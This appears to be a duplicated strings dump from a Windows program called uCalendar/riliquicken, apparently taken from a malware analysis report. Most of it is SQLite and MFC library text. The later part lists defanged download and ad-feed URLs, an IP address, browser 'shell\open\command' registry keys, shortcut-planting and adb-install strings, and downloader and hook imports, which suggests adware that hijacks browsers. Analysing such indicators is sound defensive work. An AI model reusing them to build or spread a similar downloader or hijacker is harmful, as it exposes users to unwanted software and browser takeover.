Bad ptr map entry key=%d expected=(%d,%d) got=(%d,%d)

%d of %d pages missing from overflow list starting at %d

%d of %d pages missing from overflow list starting at %d

failed to get page %d

failed to get page %d

freelist leaf count too big on page %d

freelist leaf count too big on page %d

Page %d:

Page %d:

unable to get the page. error code=%d

unable to get the page. error code=%d

btreeInitPage() returns error code %d

btreeInitPage() returns error code %d

On tree page %d cell %d:

On tree page %d cell %d:

On page %d at right child:

On page %d at right child:

Corruption detected in cell %d on page %d

Corruption detected in cell %d on page %d

Multiple uses for byte %d of page %d

Multiple uses for byte %d of page %d

Fragmentation of %d bytes reported as %d on page %d

Fragmentation of %d bytes reported as %d on page %d

Page %d is never used

Page %d is never used

Pointer map page %d is referenced

Pointer map page %d is referenced

Outstanding page count goes from %d to %d during this analysis

Outstanding page count goes from %d to %d during this analysis

unknown database %s

unknown database %s

keyinfo(%d

keyinfo(%d

%s(%d)

%s(%d)

%s-mjX

%s-mjX

foreign key constraint failed

foreign key constraint failed

attempt to step a halted statement: [%s]

attempt to step a halted statement: [%s]

unable to use function %s in the requested context

unable to use function %s in the requested context

bind on a busy prepared statement: [%s]

bind on a busy prepared statement: [%s]

zeroblob(%d)

zeroblob(%d)

abort at %d in [%s]: %s

abort at %d in [%s]: %s

constraint failed at %d in [%s]

constraint failed at %d in [%s]

cannot open savepoint - SQL statements in progress

cannot open savepoint - SQL statements in progress

no such savepoint: %s

no such savepoint: %s

cannot %s savepoint - SQL statements in progress

cannot %s savepoint - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot rollback transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

cannot commit transaction - SQL statements in progress

sqlite_temp_master

sqlite_temp_master

sqlite_master

sqlite_master

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s WHERE %s ORDER BY rowid

database table is locked: %s

database table is locked: %s

statement aborts at %d: [%s] %s

statement aborts at %d: [%s] %s

cannot open virtual table: %s

cannot open virtual table: %s

cannot open view: %s

cannot open view: %s

no such column: "%s"

no such column: "%s"

foreign key

foreign key

indexed

indexed

cannot open %s column for writing

cannot open %s column for writing

cannot open value of type %s

cannot open value of type %s

misuse of aliased aggregate %s

misuse of aliased aggregate %s

%s: %s.%s.%s

%s: %s.%s.%s

%s: %s.%s

%s: %s.%s

%s: %s

%s: %s

not authorized to use function: %s

not authorized to use function: %s

%r %s BY term out of range - should be between 1 and %d

%r %s BY term out of range - should be between 1 and %d

too many terms in %s BY clause

too many terms in %s BY clause

Expression tree is too large (maximum depth %d)

Expression tree is too large (maximum depth %d)

variable number must be between ?1 and ?%d

variable number must be between ?1 and ?%d

too many SQL variables

too many SQL variables

too many columns in %s

too many columns in %s

misuse of aggregate: %s()

misuse of aggregate: %s()

%.*s"%w"%s

%.*s"%w"%s

%s%.*s"%w"

%s%.*s"%w"

sqlite_rename_table

sqlite_rename_table

sqlite_rename_trigger

sqlite_rename_trigger

sqlite_rename_parent

sqlite_rename_parent

%s OR name=%Q

%s OR name=%Q

there is already another table or index with this name: %s

there is already another table or index with this name: %s

sqlite_

sqlite_

table %s may not be altered

table %s may not be altered

view %s may not be altered

view %s may not be altered

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d 18) ELSE name END WHERE tbl_name=%Q AND (type='table' OR type='index' OR type='trigger');

sqlite_sequence

sqlite_sequence

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE "%w".sqlite_sequence set name = %Q WHERE name = %Q

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;

Cannot add a PRIMARY KEY column

Cannot add a PRIMARY KEY column

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

UPDATE "%w".%s SET sql = substr(sql,1,%d) || ', ' || %Q || substr(sql,%d) WHERE type = 'table' AND name = %Q

sqlite_altertab_%s

sqlite_altertab_%s

sqlite_stat1

sqlite_stat1

CREATE TABLE %Q.%s(%s)

CREATE TABLE %Q.%s(%s)

DELETE FROM %Q.%s WHERE tbl=%Q

DELETE FROM %Q.%s WHERE tbl=%Q

SELECT idx, stat FROM %Q.sqlite_stat1

SELECT idx, stat FROM %Q.sqlite_stat1

invalid name: "%s"

invalid name: "%s"

too many attached databases - max %d

too many attached databases - max %d

database %s is already in use

database %s is already in use

unable to open database: %s

unable to open database: %s

no such database: %s

no such database: %s

cannot detach database %s

cannot detach database %s

database %s is locked

database %s is locked

sqlite_detach

sqlite_detach

sqlite_attach

sqlite_attach

%s %T cannot reference objects in database %s

%s %T cannot reference objects in database %s

access to %s.%s.%s is prohibited

access to %s.%s.%s is prohibited

access to %s.%s is prohibited

access to %s.%s is prohibited

object name reserved for internal use: %s

object name reserved for internal use: %s

there is already an index named %s

there is already an index named %s

too many columns on %s

too many columns on %s

duplicate column name: %s

duplicate column name: %s

default value of column [%s] is not constant

default value of column [%s] is not constant

table "%s" has more than one primary key

table "%s" has more than one primary key

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

AUTOINCREMENT is only allowed on an INTEGER PRIMARY KEY

no such collation sequence: %s

no such collation sequence: %s

CREATE %s %.*s

CREATE %s %.*s

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='%s', name=%Q, tbl_name=%Q, rootpage=#%d, sql=%Q WHERE rowid=#%d

CREATE TABLE %Q.sqlite_sequence(name,seq)

CREATE TABLE %Q.sqlite_sequence(name,seq)

view %s is circularly defined

view %s is circularly defined

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

UPDATE %Q.%s SET rootpage=%d WHERE #%d AND rootpage=#%d

table %s may not be dropped

table %s may not be dropped

use DROP TABLE to delete table %s

use DROP TABLE to delete table %s

use DROP VIEW to delete view %s

use DROP VIEW to delete view %s

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %s.sqlite_sequence WHERE name=%Q

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.%s WHERE tbl_name=%Q and type!='trigger'

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

DELETE FROM %Q.sqlite_stat1 WHERE tbl=%Q

foreign key on %s should reference only one column of table %T

foreign key on %s should reference only one column of table %T

number of columns in foreign key does not match the number of columns in the referenced table

number of columns in foreign key does not match the number of columns in the referenced table

unknown column "%s" in foreign key definition

unknown column "%s" in foreign key definition

indexed columns are not unique

indexed columns are not unique

table %s may not be indexed

table %s may not be indexed

views may not be indexed

views may not be indexed

virtual tables may not be indexed

virtual tables may not be indexed

there is already a table named %s

there is already a table named %s

index %s already exists

index %s already exists

sqlite_autoindex_%s_%d

sqlite_autoindex_%s_%d

table %s has no column named %s

table %s has no column named %s

CREATE%s INDEX %.*s

CREATE%s INDEX %.*s

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);

no such index: %S

no such index: %S

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

index associated with UNIQUE or PRIMARY KEY constraint cannot be dropped

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.%s WHERE name=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

DELETE FROM %Q.sqlite_stat1 WHERE idx=%Q

a JOIN clause is required before %s

a JOIN clause is required before %s

unable to identify the object to be reindexed

unable to identify the object to be reindexed

table %s may not be modified

table %s may not be modified

cannot modify %s because it is a view

cannot modify %s because it is a view

sqlite_version

sqlite_version

sqlite_source_id

sqlite_source_id

sqlite_compileoption_used

sqlite_compileoption_used

sqlite_compileoption_get

sqlite_compileoption_get

foreign key mismatch

foreign key mismatch

table %S has %d columns but %d values were supplied

table %S has %d columns but %d values were supplied

%d values for %d columns

%d values for %d columns

table %S has no column named %s

table %S has no column named %s

%s.%s may not be NULL

%s.%s may not be NULL

PRIMARY KEY must be unique

PRIMARY KEY must be unique

sqlite3_extension_init

sqlite3_extension_init

unable to open shared library [%s]

unable to open shared library [%s]

no entry point [%s] in shared library [%s]

no entry point [%s] in shared library [%s]

error during initialization: %s

error during initialization: %s

automatic extension loading failed: %s

automatic extension loading failed: %s

foreign_keys

foreign_keys

foreign_key_list

foreign_key_list

*** in database %s ***

*** in database %s ***

unsupported encoding: %s

unsupported encoding: %s

malformed database schema (%s)

malformed database schema (%s)

%s - %s

%s - %s

unsupported file format

unsupported file format

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

SELECT name, rootpage, sql FROM '%q'.%s ORDER BY rowid

database schema is locked: %s

database schema is locked: %s

unknown or unsupported join type: %T %T%s%T

unknown or unsupported join type: %T %T%s%T

RIGHT and FULL OUTER JOINs are not currently supported

RIGHT and FULL OUTER JOINs are not currently supported

a NATURAL join may not have an ON or USING clause

a NATURAL join may not have an ON or USING clause

cannot have both ON and USING clauses in the same join

cannot have both ON and USING clauses in the same join

cannot join using column %s - column not present in both tables

cannot join using column %s - column not present in both tables

%s.%s

%s.%s

%s:%d

%s:%d

ORDER BY clause should come after %s not before

ORDER BY clause should come after %s not before

LIMIT clause should come after %s not before

LIMIT clause should come after %s not before

SELECTs to the left and right of %s do not have the same number of result columns

SELECTs to the left and right of %s do not have the same number of result columns

no such index: %s

no such index: %s

sqlite_subquery_%p_

sqlite_subquery_%p_

no such table: %s

no such table: %s

sqlite3_get_table() called with two or more incompatible queries

sqlite3_get_table() called with two or more incompatible queries

cannot create %s trigger on view: %S

cannot create %s trigger on view: %S

cannot create INSTEAD OF trigger on table: %S

cannot create INSTEAD OF trigger on table: %S

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

INSERT INTO %Q.%s VALUES('trigger',%Q,%Q,0,'CREATE TRIGGER %q')

no such trigger: %S

no such trigger: %S

-- TRIGGER %s

-- TRIGGER %s

no such column: %s

no such column: %s

PRAGMA vacuum_db.synchronous=OFF

PRAGMA vacuum_db.synchronous=OFF

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE TABLE vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE type='table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE INDEX vacuum_db.' || substr(sql,14) FROM sqlite_master WHERE sql LIKE 'CREATE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'CREATE UNIQUE INDEX vacuum_db.' || substr(sql,21) FROM sqlite_master WHERE sql LIKE 'CREATE UNIQUE INDEX %'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';'FROM main.sqlite_master WHERE type = 'table' AND name!='sqlite_sequence' AND rootpage>0

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'DELETE FROM vacuum_db.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name='sqlite_sequence'

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

SELECT 'INSERT INTO vacuum_db.' || quote(name) || ' SELECT * FROM main.' || quote(name) || ';' FROM vacuum_db.sqlite_master WHERE name=='sqlite_sequence';

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

INSERT INTO vacuum_db.sqlite_master SELECT type, name, tbl_name, rootpage, sql FROM main.sqlite_master WHERE type='view' OR type='trigger' OR (type='table' AND rootpage=0)

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

UPDATE %Q.%s SET type='table', name=%Q, tbl_name=%Q, rootpage=0, sql=%Q WHERE rowid=#%d

vtable constructor failed: %s

vtable constructor failed: %s

vtable constructor did not declare schema: %s

vtable constructor did not declare schema: %s

no such module: %s

no such module: %s

table %s: xBestIndex returned an invalid plan

table %s: xBestIndex returned an invalid plan

at most %d tables in a join

at most %d tables in a join

cannot use index: %s

cannot use index: %s

TABLE %s

TABLE %s

%s AS %s

%s AS %s

%s WITH INDEX %s

%s WITH INDEX %s

%s VIA MULTI-INDEX UNION

%s VIA MULTI-INDEX UNION

%s USING PRIMARY KEY

%s USING PRIMARY KEY

%s VIRTUAL TABLE INDEX %d:%s

%s VIRTUAL TABLE INDEX %d:%s

%s ORDER BY

%s ORDER BY

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the INDEXED BY clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

the NOT INDEXED clause is not allowed on UPDATE or DELETE statements within triggers

unable to close due to unfinished backup operation

unable to close due to unfinished backup operation

SQL logic error or missing database

SQL logic error or missing database

large file support is disabled

large file support is disabled

no such vfs: %s

no such vfs: %s

database corruption found by source line %d

database corruption found by source line %d

misuse detected by source line %d

misuse detected by source line %d

cannot open file at source line %d

cannot open file at source line %d

.?AVCWebBrowserEventHandler@DuiLib@@

.?AVCWebBrowserEventHandler@DuiLib@@

.?AVCWebBHandler@@

.?AVCWebBHandler@@

.?AVCMsgWnd@@

.?AVCMsgWnd@@

.?AVCWebIEHandlerpop@@

.?AVCWebIEHandlerpop@@

.?AVCWebBHandlerpop@@

.?AVCWebBHandlerpop@@

.?AVCWebBHandler1@@

.?AVCWebBHandler1@@

.?AVGenericHTTPClient@@

.?AVGenericHTTPClient@@

.PAVCException@@

.PAVCException@@

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\uCalendar.exe

(*8\(*8\(*8\(*8\

(*8\(*8\(*8\(*8\

(*8\(*8\

(*8\(*8\

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\

Calendar.exe

Calendar.exe

.KA28/'

.KA28/'

=*=/=4=:=

=*=/=4=:=

3 3$3(3,3034383

3 3$3(3,3034383

0*00070^0{0

0*00070^0{0

5-555_5{5

5-555_5{5

2-252_2{2

2-252_2{2

?-?5?_?{?

?-?5?_?{?

404

404

0-0}0

0-0}0

999@99:@:

999@99:@:

7*838`8{8

7*838`8{8

6$6(6,6064686

6$6(6,6064686

5-5T5}5

5-5T5}5

: :$:(:,:0:

: :$:(:,:0:

3?4

3?4

5&757&

5&757&

9 9$9(9,9094989

9 9$9(9,9094989

7(7@7\7|7

7(7@7\7|7

accKeyboardShortcut

accKeyboardShortcut

ekernel32.dll

ekernel32.dll

mscoree.dll

mscoree.dll

KERNEL32.DLL

KERNEL32.DLL

5555443332

5555443332

05555443332

05555443332

5555443332

5555443332

(*.*)

(*.*)

uCalendar.exe

uCalendar.exe

riliquicken.exe_408:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

L$`QSSh

L$`QSSh

SWSSSh

SWSSSh

tGHt.Ht&

tGHt.Ht&

CNotSupportedException

CNotSupportedException

%s (%s:%d)

%s (%s:%d)

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\filecore.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

f:\dd\vctools\vc7libs\ship\atlmfc\src\mfc\auxdata.cpp

comctl32.dll

comctl32.dll

comdlg32.dll

comdlg32.dll

shell32.dll

shell32.dll

ole32.dll

ole32.dll

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin1.inl

hhctrl.ocx

hhctrl.ocx

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

f:\dd\vctools\vc7libs\ship\atlmfc\include\afxwin2.inl

commctrl_DragListMsg

commctrl_DragListMsg

CCmdTarget

CCmdTarget

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

Please contact the application's support team for more information.

Please contact the application's support team for more information.

- Attempt to initialize the CRT more than once.

- Attempt to initialize the CRT more than once.

- CRT not initialized

- CRT not initialized

- floating point support not loaded

- floating point support not loaded

operator

operator

GetProcessWindowStation

GetProcessWindowStation

USER32.DLL

USER32.DLL

HTTP/1.0

HTTP/1.0

https

https

No start tag for end tag '%s' at offset %d

No start tag for end tag '%s' at offset %d

End tag '%s' at offset %d does not match start tag '%s' at offset %d

End tag '%s' at offset %d does not match start tag '%s' at offset %d

Element '%s' at offset %d not ended

Element '%s' at offset %d not ended

%s at offset %d unterminated

%s at offset %d unterminated

Incorrect %s at offset %d

Incorrect %s at offset %d

hXXp://update.xiaoxinrili.com/daohang/sj.xml

hXXp://update.xiaoxinrili.com/daohang/sj.xml

Microsoft Windows NT 4.0

Microsoft Windows NT 4.0

Microsoft Windows 95

Microsoft Windows 95

Microsoft Windows 98

Microsoft Windows 98

Microsoft Windows Me

Microsoft Windows Me

Microsoft Windows 2000

Microsoft Windows 2000

Microsoft Windows XP

Microsoft Windows XP

Microsoft Windows XP Professional x64 Edition

Microsoft Windows XP Professional x64 Edition

Microsoft Windows Server 2003

Microsoft Windows Server 2003

Microsoft Windows Server 2003 R2

Microsoft Windows Server 2003 R2

Microsoft Windows Vista

Microsoft Windows Vista

Microsoft Windows Server 2008

Microsoft Windows Server 2008

Microsoft Windows 7

Microsoft Windows 7

Microsoft Windows Server 2008 R2

Microsoft Windows Server 2008 R2

hXXp://update.xiaoxinrili.com/riliser.exe

hXXp://update.xiaoxinrili.com/riliser.exe

http\shell\open\command

http\shell\open\command

Applications\iexplore.exe\shell\open\command

Applications\iexplore.exe\shell\open\command

\xiaomama1.ico

\xiaomama1.ico

\iiie.ico

\iiie.ico

file.transfer.update

file.transfer.update

file.transfer.complete

file.transfer.complete

device.state.changed

device.state.changed

device.list.changed

device.list.changed

install.apk.complete

install.apk.complete

adb.shell.complete

adb.shell.complete

100000511

100000511

hXXp://update.xiaoxinrili.com/daohang/tubiao.xml

hXXp://update.xiaoxinrili.com/daohang/tubiao.xml

Ads_Url

Ads_Url

taskbarurl

taskbarurl

IENAV_PElnkurl

IENAV_PElnkurl

IENAV_shell_changeurl

IENAV_shell_changeurl

hXXp://

hXXp://

C:\quxiu1_.lnk

C:\quxiu1_.lnk

C:\quxiu2_.lnk

C:\quxiu2_.lnk

URL=[url]

URL=[url]

HotKey=0

HotKey=0

[url]

[url]

hXXp://update.xiaoxinrili.com/daohang/yx.xml

hXXp://update.xiaoxinrili.com/daohang/yx.xml

Ads_Exe

Ads_Exe

appurl

appurl

hXXp://update.xiaoxinrili.com/InstProtect.txt

hXXp://update.xiaoxinrili.com/InstProtect.txt

uCalendar.exe

uCalendar.exe

wdj_connection_wrapper.dll

wdj_connection_wrapper.dll

adb\adb.exe

adb\adb.exe

riliser.exe

riliser.exe

data\Config.ini

data\Config.ini

SeeUpdate.exe

SeeUpdate.exe

183.61.9.60

183.61.9.60

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT)

X-

X-

e:\rili_App\riliInstall\BIN\riliquicken.pdb

e:\rili_App\riliInstall\BIN\riliquicken.pdb

KERNEL32.dll

KERNEL32.dll

USER32.dll

USER32.dll

RegOpenKeyExA

RegOpenKeyExA

RegCloseKey

RegCloseKey

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

SHLWAPI.dll

SHLWAPI.dll

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpSendRequestA

HttpSendRequestA

HttpQueryInfoA

HttpQueryInfoA

WININET.dll

WININET.dll

WS2_32.dll

WS2_32.dll

URLDownloadToFileA

URLDownloadToFileA

urlmon.dll

urlmon.dll

IPHLPAPI.DLL

IPHLPAPI.DLL

OLEACC.dll

OLEACC.dll

GetCPInfo

GetCPInfo

GetConsoleOutputCP

GetConsoleOutputCP

GetProcessHeap

GetProcessHeap

UnhookWindowsHookEx

UnhookWindowsHookEx

GetKeyState

GetKeyState

SetWindowsHookExA

SetWindowsHookExA

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GDI32.dll

GDI32.dll

WINSPOOL.DRV

WINSPOOL.DRV

COMDLG32.dll

COMDLG32.dll

OLEAUT32.dll

OLEAUT32.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.PAVCFileException@@

.PAVCFileException@@

.?AVCCmdTarget@@

.?AVCCmdTarget@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.?AVCCmdUI@@

.?AVCCmdUI@@

zcÁ

zcÁ

.?AVGenericHTTPClient@@

.?AVGenericHTTPClient@@

.PAVCException@@

.PAVCException@@

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\riliquicken.exe

%original file name%.exe

%original file name%.exe

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\

%Documents and Settings%\%current user%\Local Settings\Application Data\uCalendar\

iliquicken.exe

iliquicken.exe

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

cOXY/P.Z0.0.QR00/ZPP0000000/0PPZR.BI@/DE0,

7q7D7L7

7q7D7L7

7.747:7@7

7.747:7@7

0$0(0,000

0$0(0,000

2)2\263~3

2)2\263~3

: :;:]:}:

: :;:]:}:

3 3$3(3,30343~3

3 3$3(3,30343~3

5 5$5(5,5

5 5$5(5,5

> >@>`>

> >@>`>

accKeyboardShortcut

accKeyboardShortcut

kernel32.dll

kernel32.dll

mscoree.dll

mscoree.dll

KERNEL32.DLL

KERNEL32.DLL

devid: %s id: %d install success = %d, error_info=%s

devid: %s id: %d install success = %d, error_info=%s

riliquicken.exe

riliquicken.exe